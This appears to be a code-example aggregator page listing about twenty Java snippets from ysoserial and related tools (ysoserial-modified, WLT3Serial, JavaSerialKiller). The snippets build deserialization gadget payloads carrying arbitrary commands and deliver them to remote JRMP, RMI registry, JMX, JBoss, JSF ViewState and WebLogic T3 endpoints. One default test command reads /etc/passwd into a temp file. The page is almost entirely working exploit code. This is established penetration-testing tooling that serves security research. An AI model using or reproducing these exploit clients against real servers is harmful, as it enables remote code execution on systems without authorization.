ysoserial.payloads.ObjectPayload.Utils Java Examples

The following examples show how to use ysoserial.payloads.ObjectPayload.Utils. You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may check out the related API usage on the sidebar.
Example #1
Source File: PayloadRunner.java    From ysoserial with MIT License 6 votes vote down vote up
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
	// ensure payload generation doesn't throw an exception
	byte[] serialized = new ExecCheckingSecurityManager().callWrapped(new Callable<byte[]>(){
		public byte[] call() throws Exception {
			final String command = args.length > 0 && args[0] != null ? args[0] : getDefaultTestCmd();

			System.out.println("generating payload object(s) for command: '" + command + "'");

			ObjectPayload<?> payload = clazz.newInstance();
               final Object objBefore = payload.getObject(command);

			System.out.println("serializing payload");
			byte[] ser = Serializer.serialize(objBefore);
			Utils.releasePayload(payload, objBefore);
               return ser;
	}});

	try {
		System.out.println("deserializing payload");
		final Object objAfter = Deserializer.deserialize(serialized);
	} catch (Exception e) {
		e.printStackTrace();
	}

}
 
Example #2
Source File: JRMPClient.java    From ysoserial with MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {
    if ( args.length < 4 ) {
        System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <payload_arg>");
        System.exit(-1);
    }

    Object payloadObject = Utils.makePayloadObject(args[2], args[3]);
    String hostname = args[ 0 ];
    int port = Integer.parseInt(args[ 1 ]);
    try {
        System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
        makeDGCCall(hostname, port, payloadObject);
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(args[2], payloadObject);
}
 
Example #3
Source File: RMIRegistryExploit.java    From ysoserial with MIT License 6 votes vote down vote up
public static void exploit(final Registry registry,
		final Class<? extends ObjectPayload> payloadClass,
		final String command) throws Exception {
	new ExecCheckingSecurityManager().callWrapped(new Callable<Void>(){public Void call() throws Exception {
		ObjectPayload payloadObj = payloadClass.newInstance();
           Object payload = payloadObj.getObject(command);
		String name = "pwned" + System.nanoTime();
		Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
		try {
			registry.bind(name, remote);
		} catch (Throwable e) {
			e.printStackTrace();
		}
		Utils.releasePayload(payloadObj, payload);
		return null;
	}});
}
 
Example #4
Source File: JRMPListener.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {

        if ( args.length < 4 ) {
            System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <terminal_type> <cmd_to_exec>");
            System.exit(-1);
            return;
        }
        CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[2], args[3]); 
        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], cmdHelper);

        try {
            int port = Integer.parseInt(args[ 0 ]);
            System.err.println("* Opening JRMP listener on " + port);
            JRMPListener c = new JRMPListener(port, payloadObject);
            c.run();
        }
        catch ( Exception e ) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);
    }
 
Example #5
Source File: RMIRegistryExploit.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public static void exploit(final Registry registry,
		final Class<? extends ObjectPayload> payloadClass,
		final String terminalType,
		final String command) throws Exception {
	new ExecCheckingSecurityManager().wrap(new Callable<Void>(){public Void call() throws Exception {
		ObjectPayload payloadObj = payloadClass.newInstance();
		CmdExecuteHelper cmdHelper = new CmdExecuteHelper(terminalType, command);
           Object payload = payloadObj.getObject(cmdHelper);
		String name = "pwned" + System.nanoTime();
		Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class);
		try {
			registry.bind(name, remote);
		} catch (Throwable e) {
			e.printStackTrace();
		}
		Utils.releasePayload(payloadObj, payload);
		return null;
	}});
}
 
Example #6
Source File: JRMPClient.java    From ysoserial-modified with MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {
    if ( args.length < 5 ) {
        System.err.println(JRMPClient.class.getName() + " <host> <port> <payload_type> <terminal_type> <cmd_to_exec>");
        System.exit(-1);
    }
    
    CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[3], args[4]);
    Object payloadObject = Utils.makePayloadObject(args[2], cmdHelper);
    String hostname = args[ 0 ];
    int port = Integer.parseInt(args[ 1 ]);
    try {
        System.err.println(String.format("* Opening JRMP socket %s:%d", hostname, port));
        makeDGCCall(hostname, port, payloadObject);
    }
    catch ( Exception e ) {
        e.printStackTrace(System.err);
    }
    Utils.releasePayload(args[2], payloadObject);
}
 
Example #7
Source File: JRMPListener.java    From ysoserial with MIT License 6 votes vote down vote up
public static final void main ( final String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JRMPListener.class.getName() + " <port> <payload_type> <payload_arg>");
            System.exit(-1);
            return;
        }

        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);

        try {
            int port = Integer.parseInt(args[ 0 ]);
            System.err.println("* Opening JRMP listener on " + port);
            JRMPListener c = new JRMPListener(port, payloadObject);
            c.run();
        }
        catch ( Exception e ) {
            System.err.println("Listener error");
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);
    }
 
Example #8
Source File: JMXInvokeMBean.java    From ysoserial with MIT License 6 votes vote down vote up
public static void main(String[] args) throws Exception {

	if ( args.length < 4 ) {
		System.err.println(JMXInvokeMBean.class.getName() + " <host> <port> <payload_type> <payload_arg>");
		System.exit(-1);
	}
   	
	JMXServiceURL url = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args[0] + ":" + args[1] + "/jmxrmi");
       
	JMXConnector jmxConnector = JMXConnectorFactory.connect(url);
	MBeanServerConnection mbeanServerConnection = jmxConnector.getMBeanServerConnection();

	// create the payload
	Object payloadObject = Utils.makePayloadObject(args[2], args[3]);   
	ObjectName mbeanName = new ObjectName("java.util.logging:type=Logging");

	mbeanServerConnection.invoke(mbeanName, "getLoggerLevel", new Object[]{payloadObject}, new String[]{String.class.getCanonicalName()});

	//close the connection
	jmxConnector.close();
   }
 
Example #9
Source File: ClassTableEntry.java    From WLT3Serial with MIT License 6 votes vote down vote up
@Override
public void writeExternal(ObjectOutput oo) throws IOException {
	try {
		String payloadType = System.getProperty("bort.millipede.wlt3.type");
		String command = System.getProperty("bort.millipede.wlt3.command");
		if((payloadType != null) && (command != null) && !sent) { //if payload options are in JVM System properties and the payload does not appear to have been sent: write payload to T3
			final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
			final ObjectPayload payload = payloadClass.newInstance();
			oo.writeObject(payload.getObject(command));
			sent = true;
			System.setProperty("bort.millipede.wlt3.sent",Boolean.toString(true));
		} else {
			oo.writeObject(descriptor);
		}
		oo.writeBytes(annotation);
	} catch(Exception e) {
		System.err.println("Exception occurred in custom ClassTableEntry class writeExternal() method!!!");
		e.printStackTrace();
	}
}
 
Example #10
Source File: GeneratePayload.java    From ysoserial with MIT License 6 votes vote down vote up
private static void printUsage() {
System.err.println("Y SO SERIAL?");
System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'");
System.err.println("  Available payload types:");

final List<Class<? extends ObjectPayload>> payloadClasses =
	new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
Collections.sort(payloadClasses, new Strings.ToStringComparator()); // alphabetize

      final List<String[]> rows = new LinkedList<String[]>();
      rows.add(new String[] {"Payload", "Authors", "Dependencies"});
      rows.add(new String[] {"-------", "-------", "------------"});
      for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
           rows.add(new String[] {
              payloadClass.getSimpleName(),
              Strings.join(Arrays.asList(Authors.Utils.getAuthors(payloadClass)), ", ", "@", ""),
              Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "")
          });
      }

      final List<String> lines = Strings.formatTable(rows);

      for (String line : lines) {
          System.err.println("     " + line);
      }
  }
 
Example #11
Source File: GeneratePayload.java    From JavaSerialKiller with MIT License 5 votes vote down vote up
public static void main(final String[] args) {
	if (args.length != 2) {
		printUsage();
		System.exit(USAGE_CODE);
	}
	final String payloadType = args[0];
	final String command = args[1];

	final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
	if (payloadClass == null) {
		System.err.println("Invalid payload type '" + payloadType + "'");
		printUsage();
		System.exit(USAGE_CODE);
	}

	try {
		final ObjectPayload payload = payloadClass.newInstance();
		final Object object = payload.getObject(command);
		PrintStream out = System.out;
		Serializer.serialize(object, out);
	} catch (Throwable e) {
		System.err.println("Error while generating or serializing payload");
		e.printStackTrace();
		System.exit(INTERNAL_ERROR_CODE);
	}
	System.exit(0);
}
 
Example #12
Source File: JBoss.java    From ysoserial with MIT License 5 votes vote down vote up
public static void main ( String[] args ) {

        if ( args.length < 3 ) {
            System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <payload_arg>");
            System.exit(-1);
        }

        URI u = URI.create(args[ 0 ]);

        final Object payloadObject = Utils.makePayloadObject(args[1], args[2]);

        String username = null;
        String password = null;
        if ( u.getUserInfo() != null ) {
            int sep = u.getUserInfo().indexOf(':');
            if ( sep >= 0 ) {
                username = u.getUserInfo().substring(0, sep);
                password = u.getUserInfo().substring(sep + 1);
            }
            else {
                System.err.println("Need <user>:<password>@");
                System.exit(-1);
            }
        }

        doRun(u, payloadObject, username, password);
        Utils.releasePayload(args[1], payloadObject);
    }
 
Example #13
Source File: JSF.java    From ysoserial with MIT License 5 votes vote down vote up
public static void main ( String[] args ) {

        if ( args.length < 3 ) {
            System.err.println(JSF.class.getName() + " <view_url> <payload_type> <payload_arg>");
            System.exit(-1);
        }

        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], args[ 2 ]);

        try {
            URL u = new URL(args[ 0 ]);

            URLConnection c = u.openConnection();
            if ( ! ( c instanceof HttpURLConnection ) ) {
                throw new IllegalArgumentException("Not a HTTP url");
            }

            HttpURLConnection hc = (HttpURLConnection) c;
            hc.setDoOutput(true);
            hc.setRequestMethod("POST");
            hc.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            OutputStream os = hc.getOutputStream();

            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(bos);
            oos.writeObject(payloadObject);
            oos.close();
            byte[] data = bos.toByteArray();
            String requestBody = "javax.faces.ViewState=" + URLEncoder.encode(Base64.encodeBase64String(data), "US-ASCII");
            os.write(requestBody.getBytes("US-ASCII"));
            os.close();

            System.err.println("Have response code " + hc.getResponseCode() + " " + hc.getResponseMessage());
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);

    }
 
Example #14
Source File: GeneratePayload.java    From ysoserial with MIT License 5 votes vote down vote up
public static void main(final String[] args) {
	if (args.length != 2) {
		printUsage();
		System.exit(USAGE_CODE);
	}
	final String payloadType = args[0];
	final String command = args[1];

	final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
	if (payloadClass == null) {
		System.err.println("Invalid payload type '" + payloadType + "'");
		printUsage();
		System.exit(USAGE_CODE);
		return; // make null analysis happy
	}

	try {
		final ObjectPayload payload = payloadClass.newInstance();
		final Object object = payload.getObject(command);
		PrintStream out = System.out;
		Serializer.serialize(object, out);
		ObjectPayload.Utils.releasePayload(payload, object);
	} catch (Throwable e) {
		System.err.println("Error while generating or serializing payload");
		e.printStackTrace();
		System.exit(INTERNAL_ERROR_CODE);
	}
	System.exit(0);
}
 
Example #15
Source File: GeneratePayload.java    From JavaSerialKiller with MIT License 5 votes vote down vote up
private static void printUsage() {
	System.err.println("Y SO SERIAL?");
	System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
	System.err.println("\tAvailable payload types:");
	final List<Class<? extends ObjectPayload>> payloadClasses =
		new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
	Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
	for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
		System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
	}
}
 
Example #16
Source File: GeneratePayload.java    From ysoserial-modified with MIT License 5 votes vote down vote up
public static void main(final String[] args) {
	if (args.length != 3) {
		printUsage();
		System.exit(USAGE_CODE);
	}
	final String payloadType = args[0];
	final String terminalType = args[1];
	final String command = args[2];

	final Class<? extends ObjectPayload> payloadClass = Utils.getPayloadClass(payloadType);
	if (payloadClass == null) {
		System.err.println("Invalid payload type '" + payloadType + "'");
		printUsage();
		System.exit(USAGE_CODE);
		return; // make null analysis happy
	}
	
	if (!terminalTypes.contains(terminalType)) {
		System.err.println("Invalid terminal type '" + terminalType + "'");
		printUsage();
		System.exit(USAGE_CODE);
		return; // make null analysis happy
	}

	try {
		final ObjectPayload payload = payloadClass.newInstance();
		CmdExecuteHelper cmdHelper = new CmdExecuteHelper(terminalType, command);
		final Object object = payload.getObject(cmdHelper);
		PrintStream out = System.out;
		Serializer.serialize(object, out);
		ObjectPayload.Utils.releasePayload(payload, object);
	} catch (Throwable e) {
		System.err.println("Error while generating or serializing payload");
		e.printStackTrace();
		System.exit(INTERNAL_ERROR_CODE);
	}
	System.exit(0);
}
 
Example #17
Source File: WLT3Serial.java    From WLT3Serial with MIT License 5 votes vote down vote up
private static void usage() {
	System.err.println("Usage: WLT3Serial [OPTIONS] REMOTE_HOST REMOTE_PORT PAYLOAD_TYPE PAYLOAD_CMD");
	System.err.println("\nOptions:");
	System.err.println("\t--help\t\t\t\tprint usage (you\'re lookin at it)\n");
	System.err.println("\t--verbose\t\t\tVerbose output (full thrown exception output; Disabled by default)\n");
	System.err.println("\t--method=EXPLOIT_METHOD\t\tExploit Method for delivering generated ysoserial payload");
	System.err.println("\t\tExploit Methods:\n\t\t\tProperty\tSend ysoserial payload as connection environment property value (Default; via javax.naming.Context.lookup(), variation of ysoserial.exploit.RMIRegistryExploit)");
	System.err.println("\t\t\tBind\t\tSend ysoserial payload as object to bind to name (via javax.naming.Context.bind(), similar to ysoserial.exploit.RMIRegistryExploit)");
	System.err.println("\t\t\tWLBind\t\tSend ysoserial payload as WebLogic RMI object to bind to name (via weblogic.rmi.Naming.bind(), similar to ysoserial.exploit.RMIRegistryExploit)");
	System.err.println("\t\t\tCustomClass\tSend ysoserial payload during T3/T3S connection initialization (via custom weblogic.rjvm.ClassTableEntry class, similar to JavaUnserializeExploits weblogic.py)\n");
	System.err.println("\t--t3s[=PROTOCOL]\t\tUse T3S (transport-encrypted) connection (Disabled by default)");
	System.err.println("\t\tProtocols:\n\t\t\tTLSv1.2\n\t\t\tTLSv1.1\n\t\t\tTLSv1 (Default)\n\t\t\tSSLv3");
	System.err.println("\t\t\tSSLv2 (SSLv2Hello handshake only, then fallback to SSLv3 for communication: this is an Oracle Java limitation, not a WLT3Serial limitation)\n\n");
	
	//list available ysoserial payload types, or print error on failure
	System.err.println("Available Payload Types (WebLogic is usually vulnerable to \"CommonsCollectionsX\" and \"JRMPClientX\" types):");
	try {
		final List<Class<? extends ObjectPayload>> payloadClasses = new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
		Collections.sort(payloadClasses, new Strings.ToStringComparator());
		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
			System.err.println("\t"+payloadClass.getSimpleName());
		}
		System.err.println("");
	} catch(NoClassDefFoundError ncdfe) {
		System.err.println("\tNo ysoserial object payload classes found! Ensure that ysoserial jar file is in classpath when executing WLT3Serial!\n");
	} catch(Exception e) {
		System.err.println("\tUnknown Error occurred while listing ysoserial object payload classes ("+e.getClass().getName()+")!");
	}
}
 
Example #18
Source File: PayloadRunner.java    From ysoserial-modified with MIT License 5 votes vote down vote up
public static void run(final Class<? extends ObjectPayload<?>> clazz, final String[] args) throws Exception {
	// ensure payload generation doesn't throw an exception
	byte[] serialized = new ExecCheckingSecurityManager().wrap(new Callable<byte[]>(){
		public byte[] call() throws Exception {
			final String command = args.length > 0 && args[0] != null ? args[0] : "cat /etc/passwd > /tmp/seraquefunfou";

			System.out.println("generating payload object(s) for command: '" + command + "'");
			
			CmdExecuteHelper cmdHelper = new CmdExecuteHelper("bash", command);
			
			ObjectPayload<?> payload = clazz.newInstance();
               final Object objBefore = payload.getObject(cmdHelper);

			System.out.println("serializing payload");
			byte[] ser = Serializer.serialize(objBefore);
			Utils.releasePayload(payload, objBefore);
               return ser;
	}});

	try {
		System.out.println("deserializing payload");
		final Object objAfter = Deserializer.deserialize(serialized);
	} catch (Exception e) {
		e.printStackTrace();
	}

}
 
Example #19
Source File: JBoss.java    From ysoserial-modified with MIT License 5 votes vote down vote up
public static void main ( String[] args ) {
    
    if ( args.length < 4 ) {
        System.err.println("Usage " + JBoss.class.getName() + " <uri> <payload> <terminal_type> <cmd_to_execute>");
        System.exit(-1);
    }

    URI u = URI.create(args[ 0 ]);
    
    CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[2], args[3]); 

    final Object payloadObject = Utils.makePayloadObject(args[1], cmdHelper);
    
    String username = null;
    String password = null;
    if ( u.getUserInfo() != null ) {
        int sep = u.getUserInfo().indexOf(':');
        if ( sep >= 0 ) {
            username = u.getUserInfo().substring(0, sep);
            password = u.getUserInfo().substring(sep + 1);
        }
        else {
            System.err.println("Need <user>:<password>@");
            System.exit(-1);
        }
    }

    doRun(u, payloadObject, username, password);
    Utils.releasePayload(args[1], payloadObject);
}
 
Example #20
Source File: JSF.java    From ysoserial-modified with MIT License 5 votes vote down vote up
public static void main ( String[] args ) {

        if ( args.length < 4 ) {
            System.err.println(JSF.class.getName() + " <view_url> <payload_type> <terminal_type> <payload_arg>");
            System.exit(-1);
        }
        CmdExecuteHelper cmdHelper = new CmdExecuteHelper(args[2], args[3]);
        final Object payloadObject = Utils.makePayloadObject(args[ 1 ], cmdHelper);

        try {
            URL u = new URL(args[ 0 ]);

            URLConnection c = u.openConnection();
            if ( ! ( c instanceof HttpURLConnection ) ) {
                throw new IllegalArgumentException("Not a HTTP url");
            }

            HttpURLConnection hc = (HttpURLConnection) c;
            hc.setDoOutput(true);
            hc.setRequestMethod("POST");
            hc.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
            OutputStream os = hc.getOutputStream();

            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(bos);
            oos.writeObject(payloadObject);
            oos.close();
            byte[] data = bos.toByteArray();
            String requestBody = "javax.faces.ViewState=" + URLEncoder.encode(Base64.encodeBase64String(data), "US-ASCII");
            os.write(requestBody.getBytes("US-ASCII"));
            os.close();

            System.err.println("Have response code " + hc.getResponseCode() + " " + hc.getResponseMessage());
        }
        catch ( Exception e ) {
            e.printStackTrace(System.err);
        }
        Utils.releasePayload(args[1], payloadObject);

    }
 
Example #21
Source File: GeneratePayload.java    From ysoserial-modified with MIT License 5 votes vote down vote up
private static void printUsage() {
	System.err.println("Y SO SERIAL?");
	System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] [terminal type: cmd / bash / powershell / none] '[command to execute]'");
	System.err.println("   ex: java -jar ysoserial-[version]-all.jar CommonsCollections5 bash 'touch /tmp/ysoserial'");
	System.err.println("\tAvailable payload types:");
	final List<Class<? extends ObjectPayload>> payloadClasses =
		new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
	Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
	for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
		System.err.println("\t\t" + payloadClass.getSimpleName() + " " + Arrays.asList(Dependencies.Utils.getDependencies(payloadClass)));
	}
}